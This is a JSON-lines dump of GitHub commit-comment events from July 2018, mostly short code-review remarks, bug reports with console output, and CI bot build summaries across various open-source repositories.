{"id":"7950557110","type":"CommitCommentEvent","actor":{"login":"aoubeid"},"repo":{"name":"aoubeid/hello_world"},"payload":{"comment":{"id":29672253,"position":null,"line":null,"path":null,"commit_id":"8092c48904133033757bd7881adc4b4d91e9b845","created_at":"2018-07-11T14:41:34Z","updated_at":"2018-07-11T14:41:34Z","author_association":"OWNER","body":"this is initial repository"}},"created_at":"2018-07-11T14:41:34Z"}
{"id":"7950564446","type":"CommitCommentEvent","actor":{"login":"zhouchengkho"},"repo":{"name":"zhouchengkho/php-express"},"payload":{"comment":{"id":29672270,"position":null,"line":null,"path":null,"commit_id":"32dc76d1ca1fa0da74829a2598510b58cab75e85","created_at":"2018-07-11T14:42:39Z","updated_at":"2018-07-11T14:42:39Z","author_association":"OWNER","body":"Hey man, great work for this lib, just what I needed. I did a few tweaks to make this more useful, don't know if you are still maintaining it, if you are, take a look:\r\n1. added maxBuffer support by passing it as an option\r\n2. added $_REQUEST as a merged array from $_GET, $_POST for php exec support"}},"created_at":"2018-07-11T14:42:39Z"}
{"id":"7950566464","type":"CommitCommentEvent","actor":{"login":"vlsi"},"repo":{"name":"pgjdbc/pgjdbc"},"payload":{"comment":{"id":29672275,"position":null,"line":null,"path":null,"commit_id":"671913b1b2e68668c11b8b4fd9a0aa9395dab5e6","created_at":"2018-07-11T14:42:57Z","updated_at":"2018-07-11T14:42:57Z","author_association":"MEMBER","body":"that is typo indeed"}},"created_at":"2018-07-11T14:42:57Z"}
{"id":"7950569100","type":"CommitCommentEvent","actor":{"login":"jpeeler"},"repo":{"name":"openshift/service-catalog"},"payload":{"comment":{"id":29672283,"position":5,"line":10,"path":"tools/junitreport/junitreport.go","commit_id":"ccd7b8a201cac4f715be1d2f7a92f409ad6d8607","created_at":"2018-07-11T14:43:21Z","updated_at":"2018-07-11T14:43:21Z","author_association":"NONE","body":"Depends on how the junit stuff is executed, which I'm not entirely familiar. The build process for catalog is done in a container that maps all the openshift/service-catalog paths to kubernetes-incubator/service-catalog to match upstream, so I assume the same is true for this."}},"created_at":"2018-07-11T14:43:21Z"}
{"id":"7950573056","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"JoeysGithuub/bookList"},"payload":{"comment":{"id":29672288,"position":null,"line":null,"path":null,"commit_id":"b1d1e1b53f8170c57ed2126ef640b44acf4b5559","created_at":"2018-07-11T14:43:56Z","updated_at":"2018-07-11T14:43:56Z","author_association":"NONE","body":"Hey Joey, it looks like you may have pushed your src file instead of your actual project. Please make a new repo and push from the root of the project, including your gitignore file."}},"created_at":"2018-07-11T14:43:56Z"}
{"id":"7950573102","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672289,"position":86,"line":375,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:43:57Z","updated_at":"2018-07-11T14:43:57Z","author_association":"NONE","body":"it should have been better to make it /check_oauth_access. Please refactor."}},"created_at":"2018-07-11T14:43:57Z"}
{"id":"7950577035","type":"CommitCommentEvent","actor":{"login":"nniesen"},"repo":{"name":"spring-projects/spring-data-jpa"},"payload":{"comment":{"id":29672294,"position":9,"line":119,"path":"src/main/java/org/springframework/data/jpa/repository/support/JpaRepositoryFactory.java","commit_id":"136a3ba6608faa1081b5fdfb8722d064cc1a19ac","created_at":"2018-07-11T14:44:32Z","updated_at":"2018-07-11T14:44:32Z","author_association":"NONE","body":"You might want to remove {{Serializable}} here to..."}},"created_at":"2018-07-11T14:44:32Z"}
{"id":"7950580451","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29672302,"position":null,"line":null,"path":null,"commit_id":"06e17c65e8ee66e56f62cdb3bc172042c5227102","created_at":"2018-07-11T14:45:03Z","updated_at":"2018-07-11T14:45:03Z","author_association":"NONE","body":"интересно он вываливается из раунда при неверном выборе ))\r\n```\r\nYour cards:\r\nA♦\r\nA♥\r\nYour points: 12\r\n\r\n    Dealer cards:\r\n    1.**\r\n    2.**\r\n   \r\n\r\n    1. Skip\r\n    2. Take card\r\n    3. Open cards\r\n    \r\ny\r\nDo you want to continue? y/n\r\ny\r\nYour cards:\r\n10♥\r\n9♥\r\nYour points: 19\r\n```"}},"created_at":"2018-07-11T14:45:03Z"}
{"id":"7950583841","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672313,"position":69,"line":249,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/entity/OAuthAuthorizationCode.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:45:31Z","updated_at":"2018-07-11T14:45:31Z","author_association":"NONE","body":"It should result single entity not a list. Change the query to select only one row."}},"created_at":"2018-07-11T14:45:31Z"}
{"id":"7950584734","type":"CommitCommentEvent","actor":{"login":"samosvat"},"repo":{"name":"vulnersCom/zabbix-threat-control"},"payload":{"comment":{"id":29672314,"position":null,"line":null,"path":null,"commit_id":"caf3cd43d616f76bea1d9d0053c72570239db6ae","created_at":"2018-07-11T14:45:39Z","updated_at":"2018-07-11T14:45:39Z","author_association":"COLLABORATOR","body":"SLES detection"}},"created_at":"2018-07-11T14:45:39Z"}
{"id":"7950589070","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672323,"position":65,"line":245,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/entity/OAuthAuthorizationCode.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:46:17Z","updated_at":"2018-07-11T14:46:17Z","author_association":"NONE","body":"Should return single entity."}},"created_at":"2018-07-11T14:46:17Z"}
{"id":"7950595270","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672338,"position":48,"line":80,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/entity/OAuthAuthorizationCode.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:47:13Z","updated_at":"2018-07-11T14:47:13Z","author_association":"NONE","body":"Limit the results to single result"}},"created_at":"2018-07-11T14:47:13Z"}
{"id":"7950604992","type":"CommitCommentEvent","actor":{"login":"AnontheAnonomys"},"repo":{"name":"FarragoFiction/LOHAESim"},"payload":{"comment":{"id":29672370,"position":null,"line":null,"path":null,"commit_id":"12d090f3e45ed9fc50064d4f9bda949f8fee51b9","created_at":"2018-07-11T14:48:40Z","updated_at":"2018-07-11T14:48:40Z","author_association":"NONE","body":"Nutfruits and dickplants"}},"created_at":"2018-07-11T14:48:40Z"}
{"id":"7950606365","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29672374,"position":null,"line":null,"path":null,"commit_id":"06e17c65e8ee66e56f62cdb3bc172042c5227102","created_at":"2018-07-11T14:48:51Z","updated_at":"2018-07-11T14:48:51Z","author_association":"NONE","body":"а почему здесь ничья?\r\n```\r\nYour cards:\r\n3♥\r\n6♦\r\n3♦\r\nYour points: 12\r\nDealer cards:\r\nJ♤\r\n7♤\r\n4♧\r\nDealer points: 21\r\nDraw\r\nDo you want to continue? y/n\r\n```"}},"created_at":"2018-07-11T14:48:51Z"}
{"id":"7950608900","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672382,"position":20,"line":75,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/oauth/DefaultOAuthAuthorizationCodeService.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:49:13Z","updated_at":"2018-07-11T14:49:13Z","author_association":"NONE","body":"Single entity"}},"created_at":"2018-07-11T14:49:13Z"}
{"id":"7950611137","type":"CommitCommentEvent","actor":{"login":"roccomuso"},"repo":{"name":"infusion/node-dhcp"},"payload":{"comment":{"id":29672384,"position":null,"line":null,"path":null,"commit_id":"5bae3817a0c59425d095d75f74f14e59d7ab551d","created_at":"2018-07-11T14:49:33Z","updated_at":"2018-07-11T14:49:33Z","author_association":"NONE","body":"NB. `Buffer.alloc` was introduced with Node v5.10.0.\r\nNot using `safe-buffer` means you have to choose whether to break older node versions or not.\r\nIf so I recommend also to change the package.json node version to `>=5.10.0`\r\n"}},"created_at":"2018-07-11T14:49:33Z"}
{"id":"7950612458","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672386,"position":32,"line":87,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/oauth/DefaultOAuthAuthorizationCodeService.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:49:45Z","updated_at":"2018-07-11T14:49:45Z","author_association":"NONE","body":"Always use a space after comma"}},"created_at":"2018-07-11T14:49:45Z"}
{"id":"7950615758","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672397,"position":43,"line":98,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/oauth/DefaultOAuthAuthorizationCodeService.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:50:16Z","updated_at":"2018-07-11T14:50:16Z","author_association":"NONE","body":"Should be \"deleted\", username. Space after comma. Formatting rules."}},"created_at":"2018-07-11T14:50:16Z"}
{"id":"7950615876","type":"CommitCommentEvent","actor":{"login":"scribam"},"repo":{"name":"antlarr/bard"},"payload":{"comment":{"id":29672398,"position":58,"line":111,"path":"bard/bard_ext.cpp","commit_id":"8759edb15433fbd5548ec4b10aa9ff5f9f763659","created_at":"2018-07-11T14:50:17Z","updated_at":"2018-07-11T14:50:17Z","author_association":"NONE","body":"@antlarr Have you though about using a [std::lock_guard](https://en.cppreference.com/w/cpp/thread/lock_guard)? I am wondering if it can help to boost the performance a bit more :thinking: Nice blog [post](https://antlarr.io/2018/07/optimizing-a-python-application-with-c-code/) by the way :+1: "}},"created_at":"2018-07-11T14:50:17Z"}
{"id":"7950616438","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29672399,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-11T14:50:21Z","updated_at":"2018-07-11T14:50:21Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T14:50:21Z"}
{"id":"7950627861","type":"CommitCommentEvent","actor":{"login":"infusion"},"repo":{"name":"infusion/node-dhcp"},"payload":{"comment":{"id":29672431,"position":null,"line":null,"path":null,"commit_id":"5bae3817a0c59425d095d75f74f14e59d7ab551d","created_at":"2018-07-11T14:52:02Z","updated_at":"2018-07-11T14:52:02Z","author_association":"OWNER","body":"Yep, you're right. I'll add the minimum version requirement to the package.json file."}},"created_at":"2018-07-11T14:52:02Z"}
{"id":"7950630624","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29672445,"position":null,"line":null,"path":null,"commit_id":"06e17c65e8ee66e56f62cdb3bc172042c5227102","created_at":"2018-07-11T14:52:26Z","updated_at":"2018-07-11T14:52:26Z","author_association":"NONE","body":"и вот ведь не очень правильно, что программа вылетает с ошибкой, вместо того чтобы вывести сообщение и завершить работу:\r\n```\r\nYour cards:\r\n10♧\r\n5♥\r\n8♦\r\nYour points: 23\r\nDealer cards:\r\n8♧\r\nK♦\r\nK♧\r\nDealer points: 28\r\nYou lose\r\nTraceback (most recent call last):\r\n\t5: from main.rb:12:in `<main>'\r\n\t4: from .../my_game.rb:11:in `run'\r\n\t3: from .../my_game.rb:11:in `loop'\r\n\t2: from .../my_game.rb:12:in `block in run'\r\n\t1: from .../my_game.rb:27:in `continue'\r\n.../my_game.rb:37:in `new_round': Insufficient funds (RuntimeError)\r\n```"}},"created_at":"2018-07-11T14:52:26Z"}
{"id":"7950633496","type":"CommitCommentEvent","actor":{"login":"valda"},"repo":{"name":"Wrye-Code-Collection/Wrye-Flash-FalloutNV"},"payload":{"comment":{"id":29672454,"position":null,"line":null,"path":null,"commit_id":"d68ab15b9309551e3f7fbc2c0d4d52378560ad31","created_at":"2018-07-11T14:52:53Z","updated_at":"2018-07-11T14:52:53Z","author_association":"CONTRIBUTOR","body":"I tested `Monitor External installation`. It seemed to be working without problems."}},"created_at":"2018-07-11T14:52:53Z"}
{"id":"7950636388","type":"CommitCommentEvent","actor":{"login":"Salakar"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29672460,"position":19,"line":368,"path":"android/src/main/java/io/invertase/firebase/notifications/RNFirebaseNotificationManager.java","commit_id":"886efcaa624aafd48a8ec56e219d0e4190e56942","created_at":"2018-07-11T14:53:18Z","updated_at":"2018-07-11T14:53:18Z","author_association":"MEMBER","body":"Hmm your right, sorry this slipped past me yesterday, was a long day...! \r\n\r\nFixing this is not a case of changing `Calendar.DATE` to the correct interval either so might be worth me patching this out for now; to be revisited later."}},"created_at":"2018-07-11T14:53:18Z"}
{"id":"7950639943","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672466,"position":11,"line":13,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/service/OAuthAuthorizationCodeService.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:53:50Z","updated_at":"2018-07-11T14:53:50Z","author_association":"NONE","body":"This should delete auth codes only for that user and not for everyone. Query should be for timestamp and username. "}},"created_at":"2018-07-11T14:53:50Z"}
{"id":"7950642630","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29672470,"position":null,"line":null,"path":null,"commit_id":"cbbd0a2be4266c50ac1f57fa00d93a69b42d817c","created_at":"2018-07-11T14:54:14Z","updated_at":"2018-07-11T14:54:14Z","author_association":"COLLABORATOR","body":"Puzzle `279-4664e37c` disappeared from [`test/commands/test_alias.rb`](https://github.com/zold-io/zold/blob/master/test/commands/test_alias.rb), that's why I closed #322. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T14:54:14Z"}
{"id":"7950643509","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29672475,"position":null,"line":null,"path":null,"commit_id":"cbbd0a2be4266c50ac1f57fa00d93a69b42d817c","created_at":"2018-07-11T14:54:21Z","updated_at":"2018-07-11T14:54:21Z","author_association":"COLLABORATOR","body":"Puzzle `322-7828612a` discovered in   [`test/commands/test_alias.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_alias.rb)   and submitted as #377. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T14:54:21Z"}
{"id":"7950644087","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29672476,"position":null,"line":null,"path":null,"commit_id":"cbbd0a2be4266c50ac1f57fa00d93a69b42d817c","created_at":"2018-07-11T14:54:27Z","updated_at":"2018-07-11T14:54:27Z","author_association":"COLLABORATOR","body":"Puzzle `322-58c2b412` discovered in   [`test/commands/test_alias.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_alias.rb)   and submitted as #378. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T14:54:27Z"}
{"id":"7950644676","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29672480,"position":null,"line":null,"path":null,"commit_id":"cbbd0a2be4266c50ac1f57fa00d93a69b42d817c","created_at":"2018-07-11T14:54:31Z","updated_at":"2018-07-11T14:54:31Z","author_association":"COLLABORATOR","body":"Puzzle `322-c77a5ea1` discovered in   [`test/commands/test_alias.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_alias.rb)   and submitted as #379. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-11T14:54:31Z"}
{"id":"7950647299","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672488,"position":51,"line":83,"path":"ArgusCore/src/main/java/com/salesforce/dva/argus/entity/OAuthAuthorizationCode.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:54:54Z","updated_at":"2018-07-11T14:54:54Z","author_association":"NONE","body":"User timestamp and username to select the rows for deletion. Deleting for all users is not a good idea on each accept."}},"created_at":"2018-07-11T14:54:54Z"}
{"id":"7950648813","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29672490,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-11T14:55:09Z","updated_at":"2018-07-11T14:55:09Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T14:55:09Z"}
{"id":"7950660805","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"ali-rantakari/trash"},"payload":{"comment":{"id":29672513,"position":null,"line":null,"path":null,"commit_id":"3fb798a13cf586b1e8f04abd79129eb9275fdf8d","created_at":"2018-07-11T14:56:49Z","updated_at":"2018-07-11T14:56:49Z","author_association":"NONE","body":"This is causing\r\n```\r\n---- Compiling:\r\n======================================\r\nclang -O2 -Wall -Wextra -Wpartial-availability -force_cpusubtype_ALL -mmacosx-version-min=10.7 -arch i386 -arch x86_64 -framework AppKit -framework ScriptingBridge -o trash trash.m HGUtils.m HGCLIUtils.m fileSize.m\r\nHGUtils.m:40:9: error: unexpected '@' in program\r\n    if (@available(macOS 10.8, *)) {\r\n        ^\r\n1 error generated.\r\nmake: *** [trash] Error 1\r\n```\r\nwith Xcode 8.2.1"}},"created_at":"2018-07-11T14:56:49Z"}
{"id":"7950662201","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":29672514,"position":null,"line":null,"path":null,"commit_id":"8487b91a84a6aad0965921fa821b5222d0ae7c2d","created_at":"2018-07-11T14:57:02Z","updated_at":"2018-07-11T14:57:02Z","author_association":"COLLABORATOR","body":"> please create ammend commit :)\r\n\r\nand `git push --force`?"}},"created_at":"2018-07-11T14:57:02Z"}
{"id":"7950662491","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29672515,"position":25,"line":207,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"b9fc8ae250af1d9952cc16fe93a1e97dfed35ea9","created_at":"2018-07-11T14:57:05Z","updated_at":"2018-07-11T14:57:05Z","author_association":"CONTRIBUTOR","body":"Whoops, this is an error. I just haven't tested compiling with profiling disabled."}},"created_at":"2018-07-11T14:57:05Z"}
{"id":"7950663098","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29672517,"position":null,"line":null,"path":null,"commit_id":"06e17c65e8ee66e56f62cdb3bc172042c5227102","created_at":"2018-07-11T14:57:10Z","updated_at":"2018-07-11T14:57:10Z","author_association":"NONE","body":"с ничьей определенно проблеммы )))\r\n```\r\nYour cards:\r\n3♥\r\n6♧\r\n7♦\r\nYour points: 16\r\nDealer cards:\r\n9♥\r\n4♦\r\n8♥\r\nDealer points: 21\r\nDraw\r\nDo you want to continue? y/n\r\n```"}},"created_at":"2018-07-11T14:57:10Z"}
{"id":"7950663556","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"JewelRam/movieStuff"},"payload":{"comment":{"id":29672518,"position":null,"line":null,"path":null,"commit_id":"dc6c27fab5bb6ccfbd0f9ad0beb60aa2041a3458","created_at":"2018-07-11T14:57:14Z","updated_at":"2018-07-11T14:57:14Z","author_association":"NONE","body":"Hey Jewel, I'm trying to run this repo, but it's not working because I don't have any api folder or database.json file in here. Also, the .gitignore seems to be missing although you did manage not to push up your node modules. Can you double check all your files and make sure the right stuff is being pushed up? Might have to make a new repo for it to do that."}},"created_at":"2018-07-11T14:57:14Z"}
{"id":"7950666801","type":"CommitCommentEvent","actor":{"login":"olivergierke"},"repo":{"name":"spring-projects/spring-data-jpa"},"payload":{"comment":{"id":29672524,"position":9,"line":119,"path":"src/main/java/org/springframework/data/jpa/repository/support/JpaRepositoryFactory.java","commit_id":"136a3ba6608faa1081b5fdfb8722d064cc1a19ac","created_at":"2018-07-11T14:57:43Z","updated_at":"2018-07-11T14:57:43Z","author_association":"MEMBER","body":"Yikes. Good catch, thanks!"}},"created_at":"2018-07-11T14:57:43Z"}
{"id":"7950673025","type":"CommitCommentEvent","actor":{"login":"jinfinance"},"repo":{"name":"jinfinance/planets"},"payload":{"comment":{"id":29672531,"position":null,"line":null,"path":null,"commit_id":"8d148c642948dbf42d36ae5f985f57d475908146","created_at":"2018-07-11T14:58:41Z","updated_at":"2018-07-11T14:58:41Z","author_association":"OWNER","body":"R.J. learning Git"}},"created_at":"2018-07-11T14:58:41Z"}
{"id":"7950684118","type":"CommitCommentEvent","actor":{"login":"Scitator"},"repo":{"name":"Scitator/pytorch-common"},"payload":{"comment":{"id":29672556,"position":50,"line":284,"path":"train/callbacks.py","commit_id":"aaf47c0c963aa21c6e045d25e569e41c20500cb1","created_at":"2018-07-11T15:00:19Z","updated_at":"2018-07-11T15:00:19Z","author_association":"OWNER","body":"@belskikh давай на полное имя перепишем, т.е. `momentum`"}},"created_at":"2018-07-11T15:00:19Z"}
{"id":"7950687524","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672573,"position":103,"line":392,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T15:00:45Z","updated_at":"2018-07-11T15:00:45Z","author_association":"NONE","body":"change the url to /oauth_approved_apps \r\n\r\nNot clear from the context which /users/authenticatedapps we are talking about. "}},"created_at":"2018-07-11T15:00:45Z"}
{"id":"7950693438","type":"CommitCommentEvent","actor":{"login":"yunzhongETian"},"repo":{"name":"yunzhongETian/study-PDF"},"payload":{"comment":{"id":29672581,"position":null,"line":null,"path":null,"commit_id":"3a26f0dcdc0e2fef6f8b4b1dff03234fb180258c","created_at":"2018-07-11T15:01:34Z","updated_at":"2018-07-11T15:01:34Z","author_association":"OWNER","body":"hhtt"}},"created_at":"2018-07-11T15:01:34Z"}
{"id":"7950693792","type":"CommitCommentEvent","actor":{"login":"dluksza"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29672582,"position":19,"line":368,"path":"android/src/main/java/io/invertase/firebase/notifications/RNFirebaseNotificationManager.java","commit_id":"886efcaa624aafd48a8ec56e219d0e4190e56942","created_at":"2018-07-11T15:01:37Z","updated_at":"2018-07-11T15:01:37Z","author_association":"CONTRIBUTOR","body":"I'm currently working on a patch that will fix this."}},"created_at":"2018-07-11T15:01:37Z"}
{"id":"7950693956","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672584,"position":122,"line":411,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T15:01:38Z","updated_at":"2018-07-11T15:01:38Z","author_association":"NONE","body":"change url to /revoke_oauth_access/{appName}"}},"created_at":"2018-07-11T15:01:38Z"}
{"id":"7950698346","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672597,"position":null,"line":null,"path":null,"commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T15:02:17Z","updated_at":"2018-07-11T15:02:17Z","author_association":"NONE","body":">Please look at my comments. Some of the url changes would require changes in front end as well.\r\n\r\n@cannakula-sfdc "}},"created_at":"2018-07-11T15:02:17Z"}
{"id":"7950702305","type":"CommitCommentEvent","actor":{"login":"allejo"},"repo":{"name":"BZFlag-Dev/bzflag"},"payload":{"comment":{"id":29672609,"position":null,"line":null,"path":null,"commit_id":"aea5bbd63d94503d3357cb32d46b19f11870d7dc","created_at":"2018-07-11T15:02:52Z","updated_at":"2018-07-11T15:02:52Z","author_association":"MEMBER","body":"whose*"}},"created_at":"2018-07-11T15:02:52Z"}
{"id":"7950705234","type":"CommitCommentEvent","actor":{"login":"aharley40"},"repo":{"name":"aharley40/shippit"},"payload":{"comment":{"id":29672615,"position":null,"line":null,"path":null,"commit_id":"ab4a0892f5deeb329348992f7b02f01698b1b978","created_at":"2018-07-11T15:03:17Z","updated_at":"2018-07-11T15:03:17Z","author_association":"OWNER","body":"good shit on this commit, no changes needed"}},"created_at":"2018-07-11T15:03:17Z"}
{"id":"7950706016","type":"CommitCommentEvent","actor":{"login":"eugulixes"},"repo":{"name":"ukhryab/hubot-happy-birthder"},"payload":{"comment":{"id":29672616,"position":4,"line":5,"path":"index.js","commit_id":"02e35feeba1974c94fcd23594dcd1c2d9a42f80b","created_at":"2018-07-11T15:03:24Z","updated_at":"2018-07-11T15:03:24Z","author_association":"NONE","body":"Put it into different commit."}},"created_at":"2018-07-11T15:03:24Z"}
{"id":"7950710549","type":"CommitCommentEvent","actor":{"login":"Salakar"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29672625,"position":19,"line":368,"path":"android/src/main/java/io/invertase/firebase/notifications/RNFirebaseNotificationManager.java","commit_id":"886efcaa624aafd48a8ec56e219d0e4190e56942","created_at":"2018-07-11T15:04:04Z","updated_at":"2018-07-11T15:04:04Z","author_association":"MEMBER","body":"@dluksza ok nice, thanks for sorting, let me know if you need anything - happy to do a patch release after to get the fix in live."}},"created_at":"2018-07-11T15:04:04Z"}
{"id":"7950711841","type":"CommitCommentEvent","actor":{"login":"simrat39"},"repo":{"name":"simrat39/android_frameworks_base"},"payload":{"comment":{"id":29672628,"position":null,"line":null,"path":null,"commit_id":"a31684c28ee3bab389df5a4a369d466190a1e652","created_at":"2018-07-11T15:04:16Z","updated_at":"2018-07-11T15:04:16Z","author_association":"OWNER","body":"Keyguard: Display animation indicator when charging "}},"created_at":"2018-07-11T15:04:16Z"}
{"id":"7950717607","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29672637,"position":75,"line":75,"path":"css/main.css","commit_id":"b5221832203b8cdc6e246d3009f3e0b6685b391c","created_at":"2018-07-11T15:05:07Z","updated_at":"2018-07-11T15:05:07Z","author_association":"NONE","body":"Названия не очевидные.\r\nДавай более осмысленные"}},"created_at":"2018-07-11T15:05:07Z"}
{"id":"7950721494","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29672644,"position":24,"line":24,"path":"css/main.css","commit_id":"b5221832203b8cdc6e246d3009f3e0b6685b391c","created_at":"2018-07-11T15:05:42Z","updated_at":"2018-07-11T15:05:42Z","author_association":"NONE","body":"codestyle\r\nу тебя табуляция разная идет\r\nCTRL + ALT + L, если используешь IDEA"}},"created_at":"2018-07-11T15:05:42Z"}
